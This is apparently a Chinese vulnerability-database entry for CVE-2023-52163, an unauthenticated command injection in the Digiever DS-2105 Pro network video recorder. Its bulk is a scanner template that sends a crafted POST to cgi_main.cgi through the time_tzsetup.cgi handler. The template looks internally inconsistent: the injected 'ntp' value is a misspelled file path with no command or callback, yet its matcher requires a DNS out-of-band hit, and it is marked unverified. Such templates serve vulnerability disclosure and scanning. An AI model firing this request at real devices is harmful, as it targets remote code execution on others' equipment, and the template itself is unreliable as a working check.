漏洞描述
Digiever DS-2105 Pro 3.1.0.71-11 contains a command injection caused by unsanitized input in time_tzsetup.cgi, letting attackers execute arbitrary commands remotely, exploit requires no authentication.
CVE-2023-52163: Digiever DS-2105 Pro - Command Injection
PoC代码[已公开]
id: CVE-2023-52163
info:
name: Digiever DS-2105 Pro - Command Injection
author: rajesh-social-tech
severity: high
description: |
Digiever DS-2105 Pro 3.1.0.71-11 contains a command injection caused by unsanitized input in time_tzsetup.cgi, letting attackers execute arbitrary commands remotely, exploit requires no authentication.
impact: |
Remote attackers can execute arbitrary commands on the device, potentially leading to full device compromise.
remediation: |
Update to a supported version or contact the vendor for security patches.
reference:
- https://www.txone.com/blog/digiever-fixes-sorely-needed/
- https://www.fortiguard.com/encyclopedia/ips/57266
- https://github.com/advisories/GHSA-mrvx-3qrr-qqxw
metadata:
max-request: 1
verified: false
tags: cve,cve2023,digiever,rce,oast,oob,kev,vkev
http:
- raw:
- |
POST /cgi-bin/cgi_main.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cgiName=time_tzsetup.cgi&ntp=/etc/digigiver-release&action=4
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(interactsh_protocol,'dns')
- contains(header, 'IE=EmulateIE10')
condition: and
# digest: 4a0a00473045022100b0ae1103f92020f574e8a7a9eda76f996b1d55505de33d36777bd02da787cf89022071cf164d225e0c2fb3a80247a8b4c452fc6ab672035e9738651643ece6d315d0:922c64590222798bb761d5b6d8e72950